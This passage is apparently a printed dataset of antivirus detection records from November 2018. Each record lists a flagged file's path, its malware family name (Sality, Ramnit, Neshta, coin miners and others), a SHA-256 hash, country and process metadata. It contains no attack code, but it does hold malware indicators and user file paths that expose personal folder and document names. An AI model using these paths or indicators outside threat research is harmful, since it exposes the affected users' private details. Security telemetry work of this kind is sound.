  Row(detection=Row(filename='tosbtmng1.exe', filepath='C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\TosBtMng1.exe', filesize=476000, name='W32/Jeefo.A.#M1.#R1'), hash='ec31759990edcce5b467b960b8e5787bed319d1e7773d35c49ed6110d3b8f144', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T18:21:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='9817ab650882f71b16a47cdef489c0c1edde5abeec990a9c55e601cc33cab0d3', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T01:16:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b5tclient.exe.vir', filepath='\\?\\C:\\Users\\X\\AppData\\Local\\B5T\\6.0.5.7\\B5TClient.exe.VIR', filesize=904000, name='Adware/Bang5Mai.IE.#M1.#R1'), hash='bc52336fc528d61dc9b9543f652eb7e1dc4c4263e3dd434d26548fed3f4ae3f6', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:12:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:40:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_vo.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\bj\\_VO\\_VO.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='c8b2350b7e53a3d3f0a0a513ca9b707f15902e005370150621b869b8f1e6a9d8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\iqewzdjyjkw\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:13:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110832-cc89bbb7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ecee166\\AVSCAN-20181102-110735-C33353C8\\AVSCAN-20181102-110832-CC89BBB7', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='! my image.scr', filepath='G:\\! My Image.scr', filesize=0, name='DR/Patched.Ren.Gen.#M1.#R1'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:48:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0012268.exe', filepath='h:\\system volume information\\_restore{d91319e2-a444-4f72-ae88-de668da52f71}\\rp2\\A0012268.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='ac3ad7f61f6dc403b5f27868d83c18089121ab71f92f18e1144cbba694fce2c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:42:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029212c', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029212c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:04:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avcenter.exe', filepath='\\?\\J:\\PROGRAMS\\anty virus\\Avira\\AntiVir PersonalEdition Classic\\avcenter.exe', filesize=512000, name='W32/Sality.#M1.#R1'), hash='bb7fb3d38e014bc10920b5470a34bd0701251ef5e1f763d9f192ada0555be4b7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:07:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='uts_new.exe', filepath='G:\\Users\\X\\Downloads\\Document\\Algo Laporan\\uts_new.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='bc94a371dd4d2d98d81e037525a9efe6aa9a593aad62f8924fc3f2066c2b6c41', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:55:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111101-a7adc10b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-111044-A61821D0\\AVSCAN-20181104-111101-A7ADC10B', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:10:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291e03', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291e03', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:01:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002915cc', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002915cc', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:51:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141930-8b526ff3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a6aeacdd\\AVSCAN-20181104-133443-34024088\\AVSCAN-20181104-141930-8B526FF3', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:19:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00294beb', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00294beb', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:47:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-180631-d5329d01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56c5e92d\\AVSCAN-20181104-180531-CC619DD1\\AVSCAN-20181104-180631-D5329D01', filesize=64000, name='HEUR/Macro.Downloader.APG.Gen.#M1.#R1'), hash='d2dfaf5e1e361b7342648856ed044041922531acda1b0dd969527582742d3b6a', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:06:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='акт медперсонал.exe', filepath='F:\\ОТЧЕТЫ БЛАНКИ\\акт медперсонал.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='d0c983396a9ca89213740d36750581c58d0e620280b356f50ed1757f131afc59', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Distrib\\Total Commander\\Totalcmd.exe', parentsize=826916, timestamp='2018-11-04T12:44:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='E:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='f30f45f64f9915a54a72936aa73d011b180246953a9e06118d22da07808df075', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:45:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:46:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-164513-d4781bbe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a57acd9\\AVSCAN-20181104-164143-AEB81878\\AVSCAN-20181104-164513-D4781BBE', filesize=7488000, name='TR/Crypt.ZPACK.Gen7.#M1.#R1'), hash='fafce976868f7835e8e966ad4117cd585cbf36427a456e6a0cca393e8dda4273', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:45:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-142127-3867d98b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a3ac0d7c\\AVSCAN-20181104-140302-AD230418\\AVSCAN-20181104-142127-3867D98B', filesize=80000, name='TR/Ghokswa.jlssq.#M1.#R1'), hash='fa0ef7cb9d547661d7f48dca8bd1d69c570339caf685aeb3a79b29356344437e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T07:21:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='install.html', filepath='\\\\?\\C:\\Program Files\\Adobe\\Adobe InDesign CS3\\Adobe_epic\\Registration\\it_IT\\install.html', filesize=4000, name='W32/Chir.B.#M1.#R1'), hash='f33eace7007d435f8157654d9f34d35067baa8dd1be334a01df3a8542622bf4b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:57:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093227-e84220f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6cc35c57\\AVSCAN-20181101-093217-E24BBF42\\AVSCAN-20181101-093227-E84220F4', filesize=33792000, name='HEUR/AGEN.1002644.#M1.#R1'), hash='f4e236b5392c3d02c5f15073254a467e3a51e8530ca4e87d4b668d58f13c7d09', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:32:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fe479ff96b15acdd5389b3a0c1fe30c95b5570c629afd150a3ed2e7bb2e60aca', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FE479FF96B15ACDD5389B3A0C1FE30C95B5570C629AFD150A3ED2E7BB2E60ACA', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fe479ff96b15acdd5389b3a0c1fe30c95b5570c629afd150a3ed2e7bb2e60aca', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:50:27Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='autorun.exe', filepath='E:\\العاب\\الابطال الخارقون\\سونك 2\\autorun.exe', filesize=4096000, name='W32/Ramnit.C.#M1.#R1'), hash='084c65c8650c7dfb95135dc74c9b7e800c9de71aac6a38dffaadefce84798a0a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe7_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T19:47:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T18:29:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='6fc91f137a9c002320d6b28e4ce5b67f4b7a4c09bee52810ea9f715b6966f532', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T15:18:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rdrleakdiag.exe', filepath='C:\\Windows\\System32\\rdrleakdiag.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='6e56425e6d2d388d182bb3ab6e401bcfd3f3d381ad9215e100a696097a243401', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:44:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msvcp80.dll', filepath='C:\\Autodesk\\AUTOCAD+COVADIS\\auto_cad 2008 fr\\x86\\support\\NSA\\Program Files\\NLM\\NLA\\fra\\Windows\\winsxs\\r6hpravq.lm8\\msvcp80.dll', filesize=664000, name='W32/Ramnit.C.#M1.#R1'), hash='05d85422810f2caf6f3d7a68e6cb82f65491a2b906436118ba2458f1c7e040aa', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-02T06:49:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-205308-ee2138d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_598a2ae1\\AVSCAN-20181102-205233-E99925CF\\AVSCAN-20181102-205308-EE2138D1', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:53:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fil04929.exe', filepath='f:\\magdas-laptop-01-2014\\platte-extern320\\plate-pc-altxp\\plate-fund\\exe\\FIL04929.EXE', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='6a2143b7878556fd366b3aab43f1c1986cb34188194b09d3c8dbe7b1a1306ecb', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:26:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vfeedingfrenzytwo.exe', filepath='q:\\kabo.aya\\الريشة\\سمكة 2\\vFeedingFrenzyTwo.exe', filesize=2048000, name='W32/Sality.AT.#M1.#R1'), hash='0aaa8926f02b514e4de6a1a7ef37ed5c4757c53d0a98b70f9f827b0a34d15027', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:12:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bin.scr', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\bin\\bin.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe14_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:47:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-192427-6d1840df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_824148e7\\AVSCAN-20181102-192316-675D3F4C\\AVSCAN-20181102-192427-6D1840DF', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:24:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:37:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:40:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='currículo vitae.exe', filepath='D:\\RESPALDO 12-12-2010\\MIS TRABAJOS\\CURRÍCULO VITAE.exe', filesize=840000, name='W32/Sality.Y.#M1.#R1'), hash='49724b1135be58bdba9c3a76f7969913d9dd78a88429d312b2d0b2b50f965a22', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-02T19:13:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-173138-b22ad116', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_227d97c0\\AVSCAN-20181102-173114-AF0FF694\\AVSCAN-20181102-173138-B22AD116', filesize=256000, name='TR/Agent.6b609b.#M1.#R1'), hash='6b609bf13be04c0e56af6199a9a05f748877c66564c4f1108afcd4413b8d2434', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T15:32:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\AVIRA\\ANTIVIRUS\\AVIRASECURITYCENTERAGENT.EXE', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/LOGFILE=\\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Avira\\\\\\\\Antivirus\\\\\\\\LOGFILES\\\\\\\\AviraSecurityCenterAgent-2018-11-02-07-05-09.log\\\\\\" \\\\\\/LOGLEVEL=\\\\\\"STANDARD\\\\\\" \\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-22T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpschd.dll Cyclic Check\\\\\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', parentsize=840000, timestamp='2018-11-02T23:45:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dpinst64.exe', filepath='D:\\User Before\\Lenovo Driver HRM\\Wireless_18.11.0_Ds64\\DPInst64.exe', filesize=1092000, name='W32/Neshta.A.#M1.#R1'), hash='23e6ee9ba866136e9c084b7021e88e8e51d3a3b544589c3a5fed10fc6c3cfc9f', metadata=Row(cmdline='\\\\\\/c', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=194640, timestamp='2018-11-02T03:45:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:30:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='match finder.exe', filepath='D:\\STIKES\\Pak Pri\\Master\\GATOT\\PRESTASI\\lain-lain\\Games\\SpongeBob Collapse\\GameFlash\\Fun Application\\MATCH FINDER.EXE', filesize=512000, name='TR/Patched.Gen.#M300.#R3369'), hash='675e92ff8671633cd27a93e814ed12baea3ad9a4821fa78607f510829d692afe', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\Serverx.exe', parentsize=37066, timestamp='2018-11-02T04:25:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T23:15:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Documents and Settings\\X\\Τα έγγραφά μου\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:43:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-003311-22d94e06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_267b6185\\AVSCAN-20181102-235252-420EE3D5\\AVSCAN-20181103-003311-22D94E06', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:33:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:38Z'), dt=datetime.date(2018, 11, 2)),
